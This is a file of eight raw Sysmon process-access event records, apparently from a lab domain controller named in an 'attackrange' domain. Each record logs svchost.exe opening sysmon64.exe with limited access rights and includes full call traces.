{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1562,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1563,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1564,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1565,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1566,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1567,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1568,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1569,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
